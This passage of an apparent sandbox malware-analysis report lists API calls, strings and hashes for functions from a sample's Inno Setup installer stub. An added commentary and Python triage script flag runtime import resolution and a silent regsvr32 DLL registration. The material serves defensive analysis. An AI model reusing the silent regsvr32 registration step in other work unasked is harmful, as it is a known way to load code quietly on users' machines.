                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                      • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$StretchText
                                                                                                      • String ID:
                                                                                                      • API String ID: 2984075790-0
                                                                                                      • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                      • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                      • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                      • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseDirectoryHandleSystem
                                                                                                      • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                      • API String ID: 2051275411-1862435767
                                                                                                      • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                      • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                      • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                      • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
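The entry above is the one worth a second look in this listing: it builds a command line from `regsvr32.exe"` and ` /s "` (the silent switch; ` /u` is the unregister variant), locates the binary via GetSystemDirectoryA, and logs "Spawning 32-bit RegSvr32: " / "Spawning 64-bit RegSvr32: ". Those log strings, like "Inno-Setup-RegSvr-Mutex" and "Deleting Uninstall data files." in later entries, match messages from the Inno Setup installer runtime, so these functions are most likely the installer stub rather than the Socks5Systemz payload itself; a reviewer still wants them surfaced, because a silent regsvr32 DLL registration is a common LOLBin step. The "APIs", "Strings" and "Similarity" fields are regular enough to parse mechanically. The Python below is an added example, not Joe Sandbox tooling and not part of this report: it turns a constructed, abbreviated sample transcribed from the entries on this page into records, flags functions that resolve imports at runtime through GetProcAddress (as the inflate* entry does) or carry a regsvr32.exe command line, and clusters functions that share an API String ID (the two Palette entries below differ only in their Instruction Fuzzy Hash). The record layout, regular expressions and triage rules are my own assumptions about the format, not a published schema.

```python
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: five entries transcribed from the report listing and abbreviated.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
• GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
Similarity
• String ID: inflate$inflateEnd$inflateInit_$inflateReset
• API String ID: 190572456-3516654456
APIs
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
Similarity
• String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
• API String ID: 2051275411-1862435767
APIs
• GetFocus.USER32 ref: 0041B745
Similarity
• API String ID: 3275473261-1959103961
• Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
APIs
• GetFocus.USER32 ref: 0041BA17
Similarity
• API String ID: 3275473261-1959103961
• Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
APIs
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
Strings
• Deleting Uninstall data files., xrefs: 004964FB
Similarity
• API String ID: 1570157960-2568741658
"""

# Assumed line shapes (derived from the listing, not a documented grammar).
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<api>\w+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
SIM_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+): ?(?P<val>.*)$")
HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    api: str
    mod: str
    args: list[str]
    ref: str              # call-site address in the dumped image
    subcall: str | None   # set when the report attributes the call to a callee


@dataclass
class Entry:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)   # (text, xref)
    similarity: dict[str, str] = field(default_factory=dict)


def parse_entries(text: str) -> list[Entry]:
    """Each 'APIs' header opens a new function entry; later headers switch section."""
    entries: list[Entry] = []
    section = None
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs":
            entries.append(Entry())
            section = "APIs"
        elif line in HEADERS:
            section = line
        elif entries and section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            entries[-1].calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
        elif entries and section == "Strings" and (m := STR_RE.match(line)):
            entries[-1].strings.append((m["text"], m["ref"]))
        elif entries and section == "Similarity" and (m := SIM_RE.match(line)):
            entries[-1].similarity[m["key"]] = m["val"]
    return entries


def triage(entry: Entry) -> dict[str, list[str]]:
    """Indicators a reviewer wants per function: runtime-resolved imports and a regsvr32 spawn."""
    findings: dict[str, list[str]] = {}
    # Names fetched through GetProcAddress never show up in the static import table.
    resolved = [c.args[1] for c in entry.calls if c.api == "GetProcAddress" and len(c.args) > 1]
    if resolved:
        findings["dynamic_resolution"] = resolved
    # A command line naming regsvr32.exe means a DLL gets registered by a LOLBin; "/s" makes it silent.
    strings = [s for s in entry.similarity.get("String ID", "").split("$") if s.strip()]
    if any("regsvr32.exe" in s for s in strings):
        findings["regsvr32_spawn"] = strings
    return findings


def group_by_api_string_id(entries: list[Entry]) -> dict[str, list[str]]:
    """Cluster functions with the same call+string set; near-duplicates differ only in fuzzy hash."""
    groups: dict[str, list[str]] = defaultdict(list)
    for e in entries:
        if key := e.similarity.get("API String ID"):
            groups[key].append(e.similarity.get("Instruction Fuzzy Hash", ""))
    return dict(groups)
```

Feed the full report text to `parse_entries` and run `triage` over each entry; entries with no findings (the GDI drawing helpers, for instance) drop out, and `group_by_api_string_id` shows which remaining functions are copies of one another so they need reviewing only once.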
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                      • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                      • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$Color$Draw$OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 1005981011-0
                                                                                                      • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                      • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                      • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                      • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B745
                                                                                                      • GetDC.USER32(?), ref: 0041B751
                                                                                                      • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 3275473261-1959103961
                                                                                                      • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                      • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                      • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                      • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041BA17
                                                                                                      • GetDC.USER32(?), ref: 0041BA23
                                                                                                      • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                      • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                      • String ID: %H
                                                                                                      • API String ID: 3275473261-1959103961
                                                                                                      • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                      • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                      • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                      • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                        • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                      • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                      • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                      Strings
                                                                                                      • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                      • String ID: Deleting Uninstall data files.
                                                                                                      • API String ID: 1570157960-2568741658
                                                                                                      • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                      • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                      • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                      • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                      • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                      Strings
                                                                                                      • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                      • AddFontResource, xrefs: 004702B5
                                                                                                      • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                      • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                      • API String ID: 955540645-649663873
                                                                                                      • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                      • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                      • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                      • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                        • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                        • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                      • GetVersion.KERNEL32 ref: 00462E60
                                                                                                      • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                      • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                      • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                      • String ID: Explorer
                                                                                                      • API String ID: 2594429197-512347832
                                                                                                      • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                      • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                      • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                      • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                      • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD8,?,?,?,02152BD8), ref: 004783CC
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,02152BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                      • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                      • API String ID: 2704155762-2318956294
                                                                                                      • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                      • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                      • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                      • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                      • LocalFree.KERNEL32(007CE478,00000000,00401B68), ref: 00401ACF
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,007CE478,00000000,00401B68), ref: 00401AEE
                                                                                                      • LocalFree.KERNEL32(007CF478,?,00000000,00008000,007CE478,00000000,00401B68), ref: 00401B2D
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID: x|
                                                                                                      • API String ID: 3782394904-1195792818
                                                                                                      • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                      • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                                        • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                                      Strings
                                                                                                      • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                                      • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                                      • Deleting directory: %s, xrefs: 00459E5B
                                                                                                      • Stripped read-only attribute., xrefs: 00459E94
                                                                                                      • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                                      • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                                      • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorFindLast
                                                                                                      • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                      • API String ID: 754982922-1448842058
                                                                                                      • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                                      • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
